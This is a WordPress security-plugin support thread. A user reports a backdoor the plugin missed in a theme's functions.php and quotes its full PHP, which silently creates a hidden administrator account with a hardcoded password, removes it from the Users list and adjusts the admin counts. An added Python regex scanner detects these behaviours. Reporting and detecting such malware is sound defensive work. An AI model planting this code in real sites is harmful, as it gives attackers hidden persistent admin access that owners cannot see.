Forum Replies Created
AuthorPosts
December 1, 2022 at 1:30 am in reply to: Reply To: Auto creation of malicious admin account not detected by plugin #85203
You're very welcome. Thank you for maintaining such a great tool to help fight against malware. I have been using your plugin for years.
November 29, 2022 at 2:02 pm in reply to: Auto creation of malicious admin account not detected by plugin #81808
I just cleaned up a site and there were a few items missed by the plugin, including the following devious admin account creation and hiding in the functions.php file:
// Creates an administrator account on every page load if it does not already exist.
function wpb_admin_account(){
    $user = 'wpadminas';
    $pass = 'OpF^MJrUK$SzYcOrfG';
    $email = 'email@email.em';
    if ( !username_exists( $user ) && !email_exists( $email ) ) {
        $user_id = wp_create_user( $user, $pass, $email );
        $user = new WP_User( $user_id );
        $user->set_role( 'administrator' );
    }
}
add_action('init','wpb_admin_account');

// Excludes that account from user queries, so it does not appear in the Users list.
add_action('pre_user_query','yoursite_pre_user_query');
function yoursite_pre_user_query($user_search) {
    global $current_user;
    $username = $current_user->user_login;
    if ($username != 'codepapa') {
        global $wpdb;
        $user_search->query_where = str_replace('WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != 'wpadminas'",$user_search->query_where);
    }
}

// Lowers the displayed "All" and "Administrator" counts by one to match the filtered list.
add_filter("views_users", "dt_list_table_views");
function dt_list_table_views($views){
    $users = count_users();
    $admins_num = $users['avail_roles']['administrator'] - 1;
    $all_num = $users['total_users'] - 1;
    $class_adm = ( strpos($views['administrator'], 'current') === false ) ? "" : "current";
    $class_all = ( strpos($views['all'], 'current') === false ) ? "" : "current";
    $views['administrator'] = '<a href="users.php?role=administrator" class="' . $class_adm . '">' . translate_user_role('Administrator') . ' <span class="count">(' . $admins_num . ')</span></a>';
    $views['all'] = '<a href="users.php" class="' . $class_all . '">' . __('All') . ' <span class="count">(' . $all_num . ')</span></a>';
    return $views;
}
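Added example, not part of the original post and not the plugin's own signatures: a small static check for the three behaviours in the snippet above (admin account creation, exclusion of a login from user queries, adjusted user counts). The rule names, regexes and sample inputs are constructed for illustration; it also reports the login being hidden so it can be looked up directly in the users table.

```python
import re

# Typographic quotes/dashes (as forum software renders pasted PHP) back to ASCII.
ASCII = str.maketrans({"‘": "'", "’": "'", "′": "'", "“": '"', "”": '"', "–": "-"})

# Constructed heuristics, one per behaviour in the posted snippet.
RULES = {
    "creates_admin_user": re.compile(
        r"wp_create_user\s*\(.{0,400}?set_role\s*\(\s*['\"]administrator['\"]", re.S),
    "hides_user_from_queries": re.compile(
        r"pre_user_query.{0,600}?query_where.{0,300}?user_login\s*!=", re.S),
    "alters_user_counts": re.compile(
        r"views_users.{0,400}?count_users\s*\(\s*\).{0,400}?\]\s*-\s*1", re.S),
}
HIDDEN_LOGIN = re.compile(r"user_login\s*!=\s*['\"]([^'\"]+)")

def scan_php(source):
    """Return matched rule names and any logins excluded from user queries."""
    text = source.translate(ASCII)
    hits = sorted(name for name, rx in RULES.items() if rx.search(text))
    return {"hits": hits, "hidden_logins": sorted(set(HIDDEN_LOGIN.findall(text)))}

# Constructed sample modelled on the post; all names are placeholders.
SAMPLE_INFECTED = r'''<?php
function example_admin_account() {
    $user_id = wp_create_user('example_hidden', 'CONSTRUCTED', 'user@example.invalid');
    $user = new WP_User($user_id);
    $user->set_role('administrator');
}
add_action('init', 'example_admin_account');
add_action('pre_user_query', 'example_pre_user_query');
function example_pre_user_query($user_search) {
    global $wpdb;
    $user_search->query_where = str_replace('WHERE 1=1',
        "WHERE 1=1 AND {$wpdb->users}.user_login != 'example_hidden'",
        $user_search->query_where);
}
add_filter("views_users", "example_views");
function example_views($views) {
    $users = count_users();
    $all_num = $users['total_users'] - 1;
    return $views;
}
'''
# Constructed benign use of the same hook: it only changes the sort order.
SAMPLE_BENIGN = r'''<?php
add_action('pre_user_query', 'example_sort_users');
function example_sort_users($q) { $q->query_orderby = 'ORDER BY user_registered DESC'; }
'''

if __name__ == "__main__":
    for label, src in (("infected", SAMPLE_INFECTED), ("benign", SAMPLE_BENIGN)):
        print(label, scan_php(src))
```

A hit is a reason to read the file by hand and to compare the administrator rows in the users table against what the Users screen shows, not a verdict on its own.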